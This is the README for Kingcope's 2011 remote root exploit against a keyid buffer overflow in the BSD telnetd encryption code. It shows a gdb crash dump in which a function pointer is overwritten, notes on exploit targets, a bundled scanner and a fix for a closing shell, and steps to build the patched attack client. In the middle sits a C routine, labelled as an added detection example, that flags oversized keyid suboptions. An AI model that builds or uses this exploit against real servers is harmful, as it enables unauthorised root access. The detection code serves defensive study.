ancient bsd remote root zeroday (encryption keyid overflow)
Discovered & Exploited by Kingcope
Year 2011
--

We overwrite a function pointer.

encrypt.c last commit (freebsd):
Wed Jun 26 17:06:14 2002 UTC (8 years, 9 months ago) by markm
and an even older bug :>

gdb attached to telnetd:
Program received signal SIGSEGV, Segmentation fault.
0x08055b22 in encrypt_keyid (kp=0x805e6a0, keyid=0x8061f02 'A' <repeats 100 times>, "", len=100) at 
/usr/src/lib/libtelnet/../../contrib/telnet/libtelnet/encrypt.c:724
warning: Source file is more recent than executable.

724             if (!(ep = (*kp->getcrypt)(*kp->modep))) {
(gdb) i r
eax            0x41414141       1094795585
ecx            0x64     100
edx            0x41414141       1094795585
ebx            0xbfbfec78       -1077941128
esp            0xbfbfe770       0xbfbfe770
ebp            0xbfbfe798       0xbfbfe798
esi            0x1      1
edi            0xbfbfec80       -1077941120
eip            0x8055b22        0x8055b22
eflags         0x10282  66178
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb) x/10i $eip
0x8055b22 <encrypt_keyid+34>:   mov    (%eax),%eax
0x8055b24 <encrypt_keyid+36>:   mov    %eax,(%esp)
0x8055b27 <encrypt_keyid+39>:   call   *%edx				<---- HAHA
0x8055b29 <encrypt_keyid+41>:   mov    %eax,0xfffffffc(%ebp)
0x8055b2c <encrypt_keyid+44>:   cmpl   $0x0,0xfffffffc(%ebp)
0x8055b30 <encrypt_keyid+48>:   jne    0x8055b4b <encrypt_keyid+75>
0x8055b32 <encrypt_keyid+50>:   cmpl   $0x0,0x10(%ebp)
0x8055b36 <encrypt_keyid+54>:   je     0x8055c87 <encrypt_keyid+391>
0x8055b3c <encrypt_keyid+60>:   mov    0x8(%ebp),%eax
0x8055b3f <encrypt_keyid+63>:   movl   $0x0,0x40(%eax)
(gdb)

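The crash above is a keyid suboption whose payload (100 bytes of 'A') is longer than the fixed buffer encrypt_keyid() copies it into. As an added detection example, not part of Kingcope's package, the following scans a raw telnet byte stream for ENCRYPT ENC_KEYID/DEC_KEYID suboptions and flags any keyid payload longer than 64 bytes; the option and suboption codes are from RFC 854 and RFC 2946, the 64-byte limit is assumed to match libtelnet's MAXKEYLEN, and the sample traffic is constructed.

```c
#include <stddef.h>
#include <string.h>

/* Telnet option/suboption codes (RFC 854, RFC 2946). */
enum { IAC = 255, SB = 250, SE = 240, TELOPT_ENCRYPT = 38, ENC_KEYID = 7, DEC_KEYID = 8 };
/* Assumed size of libtelnet's fixed keyid buffer (MAXKEYLEN); a longer keyid
 * is exactly what a vulnerable encrypt_keyid() copies unchecked. */
#define KEYID_LIMIT 64

/* Return the longest ENCRYPT keyid payload in a raw telnet byte stream
 * (0 if none). A doubled IAC inside a suboption counts as one data byte. */
size_t max_keyid_len(const unsigned char *buf, size_t n)
{
    size_t max = 0;
    for (size_t i = 0; i + 3 < n; i++) {
        if (buf[i] != IAC || buf[i + 1] != SB || buf[i + 2] != TELOPT_ENCRYPT ||
            (buf[i + 3] != ENC_KEYID && buf[i + 3] != DEC_KEYID))
            continue;
        size_t len = 0, j = i + 4;
        while (j < n) {
            if (buf[j] == IAC) {
                if (j + 1 < n && buf[j + 1] == IAC) j++;  /* escaped 0xFF */
                else break;                               /* IAC SE or truncated */
            }
            len++;
            j++;
        }
        if (len > max) max = len;
        i = j;
    }
    return max;
}

/* Detection verdict: 1 if any keyid exceeds the buffer the server copies into. */
int keyid_is_oversized(const unsigned char *buf, size_t n) { return max_keyid_len(buf, n) > KEYID_LIMIT; }

/* Constructed samples (not captured traffic). */
static const unsigned char benign[] =
    { IAC, SB, TELOPT_ENCRYPT, ENC_KEYID, 0x01, IAC, SE };
static const unsigned char escaped[] =      /* keyid = { 0xFF, 0x02 } */
    { IAC, SB, TELOPT_ENCRYPT, DEC_KEYID, IAC, IAC, 0x02, IAC, SE };
int benign_flagged(void)  { return keyid_is_oversized(benign, sizeof benign); }
size_t escaped_len(void)  { return max_keyid_len(escaped, sizeof escaped); }

/* A 100-byte keyid of 'A', like the one in the crash above. */
int long_keyid_flagged(void)
{
    unsigned char pkt[110] = { IAC, SB, TELOPT_ENCRYPT, ENC_KEYID };
    memset(pkt + 4, 'A', 100);
    pkt[104] = IAC; pkt[105] = SE;
    return keyid_is_oversized(pkt, 106);
}
```
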
* main patch code and exploit logic is in libtelnet/encrypt.c & telnet/telnet.c
* targets are defined in telnet/targets.h
* added FreeBSD amd64 targets
* fixed a bug where the shell would close on freebsd.
* a simple telnet scanner is included (telnetscan.c)

how to build:
1.) checkout src-all via freebsd cvsup
2.) untar the package into /usr/src/contrib/
3.) cd into /usr/src/lib/libtelnet and type make && make install
    cd into /usr/src/usr.bin/telnet and type make && make install
